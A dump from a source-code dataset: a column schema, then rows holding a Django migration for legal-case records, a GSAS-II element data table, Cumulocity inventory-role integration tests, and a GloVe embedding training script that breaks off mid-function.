hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f28123f9b50064f16e58daccff2fb43e69d6ad62
| 3,291
|
py
|
Python
|
processos/migrations/0001_initial.py
|
stoledo85/sistema_advocacia
|
81a981a5f47de8a257f547973e51537e9af3d541
|
[
"MIT"
] | null | null | null |
processos/migrations/0001_initial.py
|
stoledo85/sistema_advocacia
|
81a981a5f47de8a257f547973e51537e9af3d541
|
[
"MIT"
] | null | null | null |
processos/migrations/0001_initial.py
|
stoledo85/sistema_advocacia
|
81a981a5f47de8a257f547973e51537e9af3d541
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.1 on 2020-09-22 16:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('clientes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Processo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('area_atuacao', models.CharField(max_length=50, verbose_name='Area de Atuação')),
('obj_acao', models.CharField(max_length=50, verbose_name='Objetivo da Ação')),
('cnj', models.CharField(max_length=20, verbose_name='Nro do Processo(CNJ)')),
('local_tramite', models.CharField(max_length=15, verbose_name='Tramite')),
('tramite_uf', models.CharField(choices=[('AC', 'Acre'), ('AL', 'Alagoas'), ('AP', 'Amapá'), ('AM', 'Amazonas'), ('BA', 'Bahia'), ('CE', 'Ceará'), ('DF', 'Distrito Federal'), ('ES', 'Espírito Santo'), ('GO', 'Goiás'), ('MA', 'Maranhão'), ('MT', 'Mato Grosso'), ('MS', 'Mato Grosso do Sul'), ('MG', 'Minas Gerais'), ('PA', 'Pará'), ('PB', 'Paraíba'), ('PR', 'Paraná'), ('PE', 'Pernanbuco'), ('PI', 'Piauí'), ('RJ', 'Rio de Janeiro'), ('RN', 'Rio Grande do Norte'), ('RS', 'Rio Grande do Sul'), ('RO', 'Rondônia'), ('RR', 'Roraima'), ('SC', 'Santa Catarina'), ('SP', 'São Paulo'), ('SE', 'Sergipe'), ('TO', 'Tocantins')], max_length=2, verbose_name='UF')),
('nro_processo', models.CharField(max_length=20, verbose_name='Processo')),
('dt_contratacao', models.DateField(verbose_name='Data da Contratação')),
('dt_encerramento', models.DateField(verbose_name='Data de Encerramento')),
('dt_trans_julgado', models.DateField(verbose_name='Data Trânsito de Julgado')),
('dt_execucao', models.DateField(verbose_name='Data de Execução')),
('dt_sentenca', models.DateField(verbose_name='Data da Sentença')),
('vlr_causa', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Valor da Causa')),
('pedido', models.CharField(max_length=50, verbose_name='Pedido')),
('obs', models.TextField(verbose_name='Obs')),
('advogado', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='Advogado Responsavel')),
('cliente', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='clientes.cliente', verbose_name='Cliente')),
],
),
migrations.CreateModel(
name='faseProcesso',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tipo_fase_processo', models.CharField(max_length=50, verbose_name='Tipo')),
('desc', models.TextField(verbose_name='Descrição')),
('processo', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='processos.processo', verbose_name='Processo')),
],
),
]
| 65.82
| 670
| 0.611668
|
7c202a933f1ae200d9e425d8953a8a11fcf1d1d3
| 15,141
|
py
|
Python
|
Xerus/GSASII/ElementTable.py
|
pedrobcst/Xerus
|
09df088e0207176df0d20715e1c9778d09d28250
|
[
"MIT"
] | 18
|
2021-12-10T03:05:49.000Z
|
2022-03-25T15:48:35.000Z
|
Xerus/GSASII/ElementTable.py
|
pedrobcst/Xerus
|
09df088e0207176df0d20715e1c9778d09d28250
|
[
"MIT"
] | 14
|
2022-02-24T11:09:26.000Z
|
2022-03-30T07:42:17.000Z
|
Xerus/GSASII/ElementTable.py
|
pedrobcst/Xerus
|
09df088e0207176df0d20715e1c9778d09d28250
|
[
"MIT"
] | 1
|
2022-02-25T16:26:54.000Z
|
2022-02-25T16:26:54.000Z
|
# -*- coding: utf-8 -*-
'''
*ElementTable: Periodic Table Data*
-----------------------------------
Element table data for building periodic table with valences & JMOL colors.
Need these in case we go back to this periodic table coloring scheme.
Defines list ``ElTable`` which contains all defined oxidation states for each
element, the location in the table, an element name, a color, a size and a
second color.
'''
REcolor = (128, 128, 255)
Metcolor = (192, 192, 192)
Noblecolor = (255, 128, 255)
Alkcolor = (255, 255, 128)
AlkEcolor = (255, 128, 0)
SemMetcolor = (128, 255, 0)
NonMetcolor = (0, 255, 255)
White = (255, 255, 255)
ElTable = [
(["H","H-1","D","D-1","T","T-1"],0,0, "Hydrogen", White, 0.0000,(255,255,255)),
(["D","D-1"], -1,-1, "Deuterium", White, 0.0000,(255,255,255)),
(["T","T-1"], -1,-1, "Tritium", White, 0.0000,(255,255,255)),
(["He",], 17,0, "Helium", Noblecolor, 0.0000,(217,255,255)),
(["Li","Li+1"], 0,1, "Lithium", Alkcolor, 0.0004,(204,128,255)),
(["Be","Be+2"], 1,1, "Beryllium", AlkEcolor, 0.0006,(194,255,0)),
(["B",], 12,1, "Boron", NonMetcolor, 0.0012,(255,181,181)),
(["C",], 13,1, "Carbon", NonMetcolor, 0.0018,(144,144,144)),
(["N",], 14,1, "Nitrogen", NonMetcolor, 0.0030,(48,80,248)),
(["O","O-1","O-2"], 15,1, "Oxygen", NonMetcolor, 0.0042,(255,13,13)),
(["F","F-1"], 16,1, "Fluorine", NonMetcolor, 0.0054,(144,224,80)),
(["Ne",], 17,1, "Neon", Noblecolor, 0.0066,(179,227,245)),
(["Na","Na+1"], 0,2, "Sodium", Alkcolor, 0.0084,(171,92,242)),
(["Mg","Mg+2"], 1,2, "Magnesium", AlkEcolor, 0.0110,(138,255,0)),
(["Al","Al+3"], 12,2, "Aluminum", SemMetcolor, 0.0125,(191,166,166)),
(["Si","Si+4"], 13,2, "Silicon", NonMetcolor, 0.0158,(240,200,160)),
(["P",], 14,2, "Phosphorus", NonMetcolor, 0.0180,(255,128,0)),
(["S",], 15,2, "Sulphur", NonMetcolor, 0.0210,(255,255,48)),
(["Cl","Cl-1"], 16,2, "Chlorine", NonMetcolor, 0.0250,(31,240,31)),
(["Ar",], 17,2, "Argon", Noblecolor, 0.0285,(128,209,227)),
(["K","K+1"], 0,3, "Potassium", Alkcolor, 0.0320,(61,255,0)),
(["Ca","Ca+2"], 1,3, "Calcium", AlkEcolor, 0.0362,(61,255,0)),
(["Sc","Sc+3"], 2,3, "Scandium", Metcolor, 0.0410,(230,230,230)),
(["Ti","Ti+2","Ti+3","Ti+4"], 3,3, "Titanium", Metcolor, 0.0460,(191,194,199)),
(["V","V+2","V+3","V+5"], 4,3, "Vanadium", Metcolor, 0.0510,(166,166,171)),
(["Cr","Cr+2","Cr+3"], 5,3, "Chromium", Metcolor, 0.0560,(138,153,199)),
(["Mn","Mn+2","Mn+3","Mn+4"], 6,3, "Manganese", Metcolor, 0.0616,(156,122,199)),
(["Fe","Fe+2","Fe+3"], 7,3, "Iron", Metcolor, 0.0680,(224,102,51)),
(["Co","Co+2","Co+3"], 8,3, "Cobalt", Metcolor, 0.0740,(240,144,160)),
(["Ni","Ni+2","Ni+3"], 9,3, "Nickel", Metcolor, 0.0815,(80,208,80)),
(["Cu","Cu+1","Cu+2"], 10,3, "Copper", Metcolor, 0.0878,(200,128,51)),
(["Zn","Zn+2"], 11,3, "Zinc", Metcolor, 0.0960,(125,128,176)),
(["Ga","Ga+3"], 12,3, "Gallium", SemMetcolor, 0.104,(194,143,143)),
(["Ge","Ge+4"], 13,3, "Germanium", SemMetcolor, 0.114,(102,143,143)),
(["As",], 14,3, "Arsenic", NonMetcolor, 0.120,(255,0,255)),
(["Se",], 15,3, "Selenium", NonMetcolor, 0.132,(255,161,0)),
(["Br","Br-1"], 16,3, "Bromine", NonMetcolor, 0.141,(166,41,41)),
(["Kr",], 17,3, "Krypton", Noblecolor, 0.150,(92,184,209)),
(["Rb","Rb+1"], 0,4, "Rubidium", Alkcolor, 0.159,(112,46,176)),
(["Sr","Sr+2"], 1,4, "Strontium", AlkEcolor, 0.171,(0,255,0)),
(["Y","Y+3"], 2,4, "Yittrium", Metcolor, 0.180,(148,255,255)),
(["Zr","Zr+4"], 3,4, "Zirconium", Metcolor, 0.192,(148,224,224)),
(["Nb","Nb+3","Nb+5"], 4,4, "Niobium", Metcolor, 0.204,(115,194,201)),
(["Mo","Mo+3","Mo+5","Mo+6"], 5,4, "Molybdenium", Metcolor, 0.216,(84,181,181)),
(["Tc",], 6,4, "Technetium", Metcolor, 0.228,(59,158,158)),
(["Ru","Ru+3","Ru+4"], 7,4, "Ruthenium", Metcolor, 0.246,(36,143,143)),
(["Rh","Rh+3","Rh+4"], 8,4, "Rhodium", Metcolor, 0.258,(10,125,140)),
(["Pd","Pd+2","Pd+4"], 9,4, "Palladium", Metcolor, 0.270,(0,105,133)),
(["Ag","Ag+1","Ag+2"], 10,4, "Silver", Metcolor, 0.285,(192,192,192)),
(["Cd","Cd+2"], 11,4, "Cadmium", Metcolor, 0.300,(255,217,143)),
(["In","In+3"], 12,4, "Indium", SemMetcolor, 0.318,(166,117,115)),
(["Sn","Sn+2","Sn+4"], 13,4, "Tin", SemMetcolor, 0.330,(102,128,128)),
(["Sb","Sb+3","Sb+5"], 14,4, "Antimony", SemMetcolor, 0.348,(158,99,181)),
(["Te",], 15,4, "Tellurium", NonMetcolor, 0.363,(212,122,0)),
(["I","I-1"], 16,4, "Iodine", NonMetcolor, 0.384,(148,0,148)),
(["Xe",], 17,4, "Xenon", Noblecolor, 0.396,(66,158,176)),
(["Cs","Cs+1"], 0,5, "Caesium", Alkcolor, 0.414,(87,23,143)),
(["Ba","Ba+2"], 1,5, "Barium", AlkEcolor, 0.438,(0,201,0)),
(["La","La+3"], 2,5, "Lanthanium", Metcolor, 0.456,(112,212,255)),
(["Ce","Ce+3","Ce+4"], 3.5,6.5, "Cerium", REcolor, 0.474,(255,255,199)),
(["Pr","Pr+3","Pr+4"], 4.5,6.5, "Praseodymium",REcolor, 0.492,(217,255,199)),
(["Nd","Nd+3"], 5.5,6.5, "Neodymium", REcolor, 0.516,(199,255,199)),
(["Pm","Pm+3"], 6.5,6.5, "Promethium", REcolor, 0.534,(163,255,199)),
(["Sm","Sm+3"], 7.5,6.5, "Samarium", REcolor, 0.558,(143,255,199)),
(["Eu","Eu+2","Eu+3"], 8.5,6.5, "Europium", REcolor, 0.582,(97,255,199)),
(["Gd","Gd+3"], 9.5,6.5, "Gadolinium", REcolor, 0.610,(69,255,199)),
(["Tb","Tb+3"], 10.5,6.5, "Terbium", REcolor, 0.624,(48,255,199)),
(["Dy","Dy+3"], 11.5,6.5, "Dysprosium", REcolor, 0.648,(31,255,199)),
(["Ho","Ho+3"], 12.5,6.5, "Holmium", REcolor, 0.672,(0,255,156)),
(["Er","Er+3"], 13.5,6.5, "Erbium", REcolor, 0.696,(0,230,117)),
(["Tm","Tm+3"], 14.5,6.5, "Thulium", REcolor, 0.723,(0,212,82)),
(["Yb","Yb+2","Yb+3"], 15.5,6.5, "Ytterbium", REcolor, 0.750,(0,191,56)),
(["Lu","Lu+3"], 16.5,6.5, "Lutetium", REcolor, 0.780,(0,171,36)),
(["Hf","Hf+4"], 3,5, "Hafnium", Metcolor, 0.804,(77,194,255)),
(["Ta","Ta+5"], 4,5, "Tantalum", Metcolor, 0.834,(77,166,255)),
(["W","W+6"], 5,5, "Tungsten", Metcolor, 0.864,(33,148,214)),
(["Re",], 6,5, "Rhenium", Metcolor, 0.900,(38,125,171)),
(["Os","Os+4"], 7,5, "Osmium", Metcolor, 0.919,(38,102,150)),
(["Ir","Ir+3","Ir+4"], 8,5, "Iridium", Metcolor, 0.948,(23,84,135)),
(["Pt","Pt+2","Pt+4"], 9,5, "Platinium", Metcolor, 0.984,(208,208,224)),
(["Au","Au+1","Au+3"], 10,5, "Gold", Metcolor, 1.014,(255,209,35)),
(["Hg","Hg+1","Hg+2"], 11,5, "Mercury", Metcolor, 1.046,(184,184,208)),
(["Tl","Tl+1","Tl+3"], 12,5, "Thallium", SemMetcolor, 1.080,(166,84,77)),
(["Pb","Pb+2","Pb+4"], 13,5, "Lead", SemMetcolor, 1.116,(87,89,97)),
(["Bi","Bi+3","Bi+5"], 14,5, "Bismuth", SemMetcolor, 1.149,(158,79,181)),
(["Po",], 15,5, "Polonium", SemMetcolor, 1.189,(171,92,0)),
(["At",], 16,5, "Astatine", NonMetcolor, 1.224,(117,79,69)),
(["Rn",], 17,5, "Radon", Noblecolor, 1.260,(66,130,150)),
(["Fr",], 0,6, "Francium", Alkcolor, 1.296,(66,0,102)),
(["Ra","Ra+2"], 1,6, "Radium", AlkEcolor, 1.332,(0,125,0)),
(["Ac","Ac+3"], 2,6, "Actinium", Metcolor, 1.374,(112,171,250)),
(["Th","Th+4"], 3.5,7.5, "Thorium", REcolor, 1.416,(0,186,255)),
(["Pa",], 4.5,7.5, "Protactinium",REcolor, 1.458,(0,161,255)),
(["U","U+3","U+4","U+6"], 5.5,7.5, "Uranium", REcolor, 1.470,(0,143,255)),
(["Np","Np+3","Np+4","Np+6"], 6.5,7.5, "Neptunium", REcolor, 1.536,(0,128,255)),
(["Pu","Pu+3","Pu+4","Pu+6"], 7.5,7.5, "Plutonium", REcolor, 1.584,(0,107,255)),
(["Am",], 8.5,7.5, "Americium", REcolor, 1.626,(84,92,242)),
(["Cm",], 9.5,7.5, "Curium", REcolor, 1.669,(120,92,227)),
(["Bk",], 10.5,7.5, "Berkelium", REcolor, 1.716,(138,79,227)),
(["Cf",], 11.5,7.5, "Californium", REcolor, 1.764,(161,54,212)),
(["Va",], 13.5,7.5, "Vacancy", White, 0.000,(255,255,255)),
(["Q","QA","QB","QC","QD"], 14.5,7.5, "Special form factor", REcolor, 0.000,(161,54,212)),
(["None",], 15.5,7.5, "No element choice",REcolor, 0.000,(161,54,212)),
]
MagElTable = [
(["Sc","Sc+1","Sc+2","Sc+3"], 2,3, "Scandium", Metcolor, 0.0410,(230,230,230)),
(["Ti","Ti+2","Ti+3"], 3,3, "Titanium", Metcolor, 0.0460,(191,194,199)),
(["V","V+1","V+2","V+3"], 4,3, "Vanadium", Metcolor, 0.0510,(166,166,171)),
(["Cr","Cr+1","Cr+2","Cr+3","Cr+4"], 5,3, "Chromium", Metcolor, 0.0560,(138,153,199)),
(["Mn","Mn+1","Mn+2","Mn+3","Mn+4"], 6,3, "Manganese", Metcolor, 0.0616,(156,122,199)),
(["Fe","Fe+1","Fe+2","Fe+3","Fe+4"], 7,3, "Iron", Metcolor, 0.0680,(224,102,51)),
(["Co","Co+1","Co+2","Co+3","Co+4"], 8,3, "Cobalt", Metcolor, 0.0740,(240,144,160)),
(["Ni","Ni+1","Ni+2","Ni+3","Ni+4"], 9,3, "Nickel", Metcolor, 0.0815,(80,208,80)),
(["Cu","Cu+1","Cu+2","Cu+3","Cu+4"], 10,3, "Copper", Metcolor, 0.0878,(200,128,51)),
(["Y"], 2,4, "Yittrium", Metcolor, 0.180,(148,255,255)),
(["Zr","Zr+1"], 3,4, "Zirconium", Metcolor, 0.192,(148,224,224)),
(["Nb","Nb+1"], 4,4, "Niobium", Metcolor, 0.204,(115,194,201)),
(["Mo","Mo+1"], 5,4, "Molybdenium", Metcolor, 0.216,(84,181,181)),
(["Tc","Tc+1"], 6,4, "Technetium", Metcolor, 0.228,(59,158,158)),
(["Ru","Ru+1"], 7,4, "Ruthenium", Metcolor, 0.246,(36,143,143)),
(["Rh","Rh+1"], 8,4, "Rhodium", Metcolor, 0.258,(10,125,140)),
(["Pd","Pd+1"], 9,4, "Palladium", Metcolor, 0.270,(0,105,133)),
#NB: zero valent atoms are copied from lowest valent ion for many of these
(["Ce","Ce+2"], 3.5,6.5, "Cerium", REcolor, 0.474,(255,255,199)),
(["Nd","Nd+2"], 5.5,6.5, "Neodymium", REcolor, 0.516,(199,255,199)),
(["Sm","Sm+2","Sm+3"], 7.5,6.5, "Samarium", REcolor, 0.558,(143,255,199)),
(["Eu","Eu+2","Eu+3"], 8.5,6.5, "Europium", REcolor, 0.582,(97,255,199)),
(["Gd","Gd+2","Gd+3"], 9.5,6.5, "Gadolinium", REcolor, 0.610,(69,255,199)),
(["Tb","Tb+2","Tb+3"], 10.5,6.5, "Terbium", REcolor, 0.624,(48,255,199)),
(["Dy","Dy+2","Dy+3"], 11.5,6.5, "Dysprosium", REcolor, 0.648,(31,255,199)),
(["Ho","Ho+2","Ho+3"], 12.5,6.5, "Holmium", REcolor, 0.672,(0,255,156)),
(["Er","Er+2","Er+3"], 13.5,6.5, "Erbium", REcolor, 0.696,(0,230,117)),
(["Tm","Tm+2","Tm+3"], 14.5,6.5, "Thulium", REcolor, 0.723,(0,212,82)),
(["Yb","Yb+2","Yb+3"], 15.5,6.5, "Ytterbium", REcolor, 0.750,(0,191,56)),
(["Hf","Hf+2","Hf+3"], 3,5, "Hafnium", Metcolor, 0.804,(77,194,255)),
(["Ta","Ta+2","Ta+3","Ta+4"], 4,5, "Tantalum", Metcolor, 0.834,(77,166,255)),
(["W","W+1","W+2","W+3","W+4","W+5"], 5,5, "Tungsten", Metcolor, 0.864,(33,148,214)),
(["Re","Re+1","Re+2","Re+3","Re+4","Re+5","Re+6"], 6,5, "Rhenium", Metcolor, 0.900,(38,125,171)),
(["Os","Os+1","Os+2","Os+3","Os+4","Os+5","Os+6","Os+7"], 7,5, "Osmium", Metcolor, 0.919,(38,102,150)),
(["Ir","Ir+1","Ir+2","Ir+3","Ir+4","Ir+5","Ir+6"], 8,5, "Iridium", Metcolor, 0.948,(23,84,135)),
(["Pt","Pt+1","Pt+2","Pt+3","Pt+4","Pt+5","Pt+6"], 9,5, "Platinium", Metcolor, 0.984,(208,208,224)),
(["Au","Au+1","Au+2","Au+3","Au+4","Au+5"], 10,5, "Gold", Metcolor, 1.014,(255,209,35)),
(["U","U+3","U+4","U+5"], 5.5,7.5, "Uranium", REcolor, 1.470,(0,143,255)),
(["Np","Np+3","Np+4","Np+5","Np+6"], 6.5,7.5, "Neptunium", REcolor, 1.536,(0,128,255)),
(["Pu","Pu+3","Pu+4","Pu+5","Pu+6"], 7.5,7.5, "Plutonium", REcolor, 1.584,(0,107,255)),
(["Am","Am+2","Am+3","Am+4","Am+5","Am+6","Am+7"], 8.5,7.5, "Americium", REcolor, 1.626,(84,92,242)),
]
| 89.064706
| 121
| 0.389472
|
d2c48a8d24ccc7a5520959fd4673b2fb05bb229f
| 4,378
|
py
|
Python
|
integration_tests/test_inventoryroles.py
|
chisou/cumulocity-python-api
|
f420b8ad2ec7735484db94b70ad6f5485585ddbb
|
[
"Apache-2.0"
] | 9
|
2021-02-16T08:53:08.000Z
|
2022-02-15T11:58:19.000Z
|
integration_tests/test_inventoryroles.py
|
chisou/cumulocity-python-api
|
f420b8ad2ec7735484db94b70ad6f5485585ddbb
|
[
"Apache-2.0"
] | 4
|
2021-04-20T12:26:41.000Z
|
2022-02-09T09:52:11.000Z
|
integration_tests/test_inventoryroles.py
|
chisou/cumulocity-python-api
|
f420b8ad2ec7735484db94b70ad6f5485585ddbb
|
[
"Apache-2.0"
] | 3
|
2021-04-26T23:05:32.000Z
|
2021-12-09T14:13:58.000Z
|
# Copyright (c) 2020 Software AG,
# Darmstadt, Germany and/or Software AG USA Inc., Reston, VA, USA,
# and/or its subsidiaries and/or its affiliates and/or their licensors.
# Use, reproduction, transfer, publication or disclosure is prohibited except
# as specifically provided for in your License Agreement with Software AG.
import pytest
from c8y_api.model import User, InventoryRole, Permission, ReadPermission, WritePermission, AnyPermission
from tests import RandomNameGenerator
def test_CRUD(live_c8y):
"""Verify that object-oriented create, update and delete works."""
permissions = [ReadPermission(scope=Permission.Scope.ANY),
WritePermission(scope=Permission.Scope.MEASUREMENT, type='c8y_Custom'),
AnyPermission(scope=Permission.Scope.ALARM, type='*')]
role = InventoryRole(name=RandomNameGenerator.random_name(2), description='SomeDescription',
permissions=permissions)
# 1) create role
role.c8y = live_c8y
role = role.create()
# -> ids are set
assert role.id
assert all(p.id for p in role.permissions)
# 2) update the role
role.description = 'new description'
del role.permissions[0]
updated_role = role.update()
# -> updated role has all the changed fields
assert updated_role.id == role.id
assert updated_role.description == role.description
# -> the ID of the permissions should persist
assert {p.id for p in updated_role.permissions} == {p.id for p in role.permissions}
# 3) delete the role
role.delete()
# -> verify that the role is gone
# (unfortunately this throws a SyntaxError instead of a KeyError)
with pytest.raises(SyntaxError):
live_c8y.inventory_roles.get(role.id)
def test_CRUD2(live_c8y):
"""Verify that API-based create, update and delete works."""
permissions = [ReadPermission(scope=Permission.Scope.ANY),
WritePermission(scope=Permission.Scope.MEASUREMENT, type='c8y_Custom'),
AnyPermission(scope=Permission.Scope.ALARM, type='*')]
role = InventoryRole(name=RandomNameGenerator.random_name(2), description='SomeDescription',
permissions=permissions)
# 1) create role
live_c8y.inventory_roles.create(role)
# 2) get all roles
all_roles = live_c8y.inventory_roles.get_all()
# -> created role can be found
created_role = next(filter(lambda r: r.name == role.name, all_roles))
# 3) can be updated
created_role.description = 'new description'
live_c8y.inventory_roles.update(created_role)
# 4) directly grab from DB
updated_role = live_c8y.inventory_roles.get(created_role.id)
# -> it was updated
assert updated_role.description == created_role.description
# 5) delete the role
live_c8y.inventory_roles.delete(created_role.id)
# -> verify that the role is gone
# (unfortunately this throws a SyntaxError instead of a KeyError)
with pytest.raises(SyntaxError):
live_c8y.inventory_roles.get(created_role.id)
def test_assignments(live_c8y, sample_device, factory):
"""Verify that inventory roles can be assigned, retrieved and unassigned."""
username = 'user_' + RandomNameGenerator.random_name(2)
role1_name = 'role_' + RandomNameGenerator.random_name(2)
role2_name = 'role_' + RandomNameGenerator.random_name(2)
# create a user
user = User(username=username, email='test@test.com')
user = factory(user)
# create inventory roles
role1 = InventoryRole(name=role1_name, permissions=[
ReadPermission(scope=Permission.Scope.ALARM),
WritePermission(scope=Permission.Scope.AUDIT)])
role1 = factory(role1)
role2 = InventoryRole(name=role2_name, permissions=[
ReadPermission(scope=Permission.Scope.ANY),
WritePermission(scope=Permission.Scope.MEASUREMENT)])
role2 = factory(role2)
# assign inventory roles
user.assign_inventory_roles(sample_device.id, role1, role2)
# verify that roles are assigned
assigned_roles = user.retrieve_inventory_role_assignments()
assert {role1_name, role2_name} == {x.name for x in assigned_roles[0].roles}
# delete the assignment
user.unassign_inventory_roles(assigned_roles[0].id)
# verify that the assignment is gone
assert not user.retrieve_inventory_role_assignments()
| 38.403509
| 105
| 0.711055
|
b46c13f26bf8956217fc51a9b3c3de3ce8c99e85
| 12,018
|
py
|
Python
|
src/nlp_class2/glove.py
|
JouniVatanen/NLP-and-Deep-Learning
|
2fddcc2c39787713d33d17e80565de4ed073ca60
|
[
"MIT"
] | 1
|
2020-05-24T06:55:31.000Z
|
2020-05-24T06:55:31.000Z
|
Machine Learning/nlp_class2/glove.py
|
Ashleshk/Machine-Learning-Data-Science-Deep-Learning
|
03357ab98155bf73b8f1d2fd53255cc16bea2333
|
[
"MIT"
] | null | null | null |
Machine Learning/nlp_class2/glove.py
|
Ashleshk/Machine-Learning-Data-Science-Deep-Learning
|
03357ab98155bf73b8f1d2fd53255cc16bea2333
|
[
"MIT"
] | 1
|
2020-03-16T13:11:14.000Z
|
2020-03-16T13:11:14.000Z
|
# Course URL:
# https://deeplearningcourses.com/c/natural-language-processing-with-deep-learning-in-python
# https://udemy.com/natural-language-processing-with-deep-learning-in-python
from __future__ import print_function, division
from builtins import range
# Note: you may need to update your version of future
# sudo pip install -U future
import os
import json
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.utils import shuffle
from util import find_analogies
import sys
sys.path.append(os.path.abspath('..'))
from rnn_class.util import get_wikipedia_data
from rnn_class.brown import get_sentences_with_word2idx_limit_vocab, get_sentences_with_word2idx
# using ALS, what's the least # files to get correct analogies?
# use this for word2vec training to make it faster
# first tried 20 files --> not enough
# how about 30 files --> some correct but still not enough
# 40 files --> half right but 50 is better
class Glove:
def __init__(self, D, V, context_sz):
self.D = D
self.V = V
self.context_sz = context_sz
def fit(self, sentences, cc_matrix=None, learning_rate=1e-4, reg=0.1, xmax=100, alpha=0.75, epochs=10, gd=False):
# build co-occurrence matrix
# paper calls it X, so we will call it X, instead of calling
# the training data X
# TODO: would it be better to use a sparse matrix?
t0 = datetime.now()
V = self.V
D = self.D
if not os.path.exists(cc_matrix):
X = np.zeros((V, V))
N = len(sentences)
print("number of sentences to process:", N)
it = 0
for sentence in sentences:
it += 1
if it % 10000 == 0:
print("processed", it, "/", N)
n = len(sentence)
for i in range(n):
# i is not the word index!!!
# j is not the word index!!!
# i just points to which element of the sequence (sentence) we're looking at
wi = sentence[i]
start = max(0, i - self.context_sz)
end = min(n, i + self.context_sz)
# we can either choose only one side as context, or both
# here we are doing both
# make sure "start" and "end" tokens are part of some context
# otherwise their f(X) will be 0 (denominator in bias update)
if i - self.context_sz < 0:
points = 1.0 / (i + 1)
X[wi,0] += points
X[0,wi] += points
if i + self.context_sz > n:
points = 1.0 / (n - i)
X[wi,1] += points
X[1,wi] += points
# left side
for j in range(start, i):
wj = sentence[j]
points = 1.0 / (i - j) # this is +ve
X[wi,wj] += points
X[wj,wi] += points
# right side
for j in range(i + 1, end):
wj = sentence[j]
points = 1.0 / (j - i) # this is +ve
X[wi,wj] += points
X[wj,wi] += points
# save the cc matrix because it takes forever to create
np.save(cc_matrix, X)
else:
X = np.load(cc_matrix)
print("max in X:", X.max())
# weighting
fX = np.zeros((V, V))
fX[X < xmax] = (X[X < xmax] / float(xmax)) ** alpha
fX[X >= xmax] = 1
print("max in f(X):", fX.max())
# target
logX = np.log(X + 1)
print("max in log(X):", logX.max())
print("time to build co-occurrence matrix:", (datetime.now() - t0))
# initialize weights
W = np.random.randn(V, D) / np.sqrt(V + D)
b = np.zeros(V)
U = np.random.randn(V, D) / np.sqrt(V + D)
c = np.zeros(V)
mu = logX.mean()
costs = []
sentence_indexes = range(len(sentences))
for epoch in range(epochs):
delta = W.dot(U.T) + b.reshape(V, 1) + c.reshape(1, V) + mu - logX
cost = ( fX * delta * delta ).sum()
costs.append(cost)
print("epoch:", epoch, "cost:", cost)
if gd:
# gradient descent method
# update W
# oldW = W.copy()
for i in range(V):
# for j in range(V):
# W[i] -= learning_rate*fX[i,j]*(W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])*U[j]
W[i] -= learning_rate*(fX[i,:]*delta[i,:]).dot(U)
W -= learning_rate*reg*W
# print "updated W"
# update b
for i in range(V):
# for j in range(V):
# b[i] -= learning_rate*fX[i,j]*(W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])
b[i] -= learning_rate*fX[i,:].dot(delta[i,:])
# b -= learning_rate*reg*b
# print "updated b"
# update U
for j in range(V):
# for i in range(V):
# U[j] -= learning_rate*fX[i,j]*(W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])*W[i]
U[j] -= learning_rate*(fX[:,j]*delta[:,j]).dot(W)
U -= learning_rate*reg*U
# print "updated U"
# update c
for j in range(V):
# for i in range(V):
# c[j] -= learning_rate*fX[i,j]*(W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])
c[j] -= learning_rate*fX[:,j].dot(delta[:,j])
# c -= learning_rate*reg*c
# print "updated c"
else:
# ALS method
# update W
# fast way
# t0 = datetime.now()
for i in range(V):
# matrix = reg*np.eye(D) + np.sum((fX[i,j]*np.outer(U[j], U[j]) for j in range(V)), axis=0)
matrix = reg*np.eye(D) + (fX[i,:]*U.T).dot(U)
# assert(np.abs(matrix - matrix2).sum() < 1e-5)
vector = (fX[i,:]*(logX[i,:] - b[i] - c - mu)).dot(U)
W[i] = np.linalg.solve(matrix, vector)
# print "fast way took:", (datetime.now() - t0)
# slow way
# t0 = datetime.now()
# for i in range(V):
# matrix2 = reg*np.eye(D)
# vector2 = 0
# for j in range(V):
# matrix2 += fX[i,j]*np.outer(U[j], U[j])
# vector2 += fX[i,j]*(logX[i,j] - b[i] - c[j])*U[j]
# print "slow way took:", (datetime.now() - t0)
# assert(np.abs(matrix - matrix2).sum() < 1e-5)
# assert(np.abs(vector - vector2).sum() < 1e-5)
# W[i] = np.linalg.solve(matrix, vector)
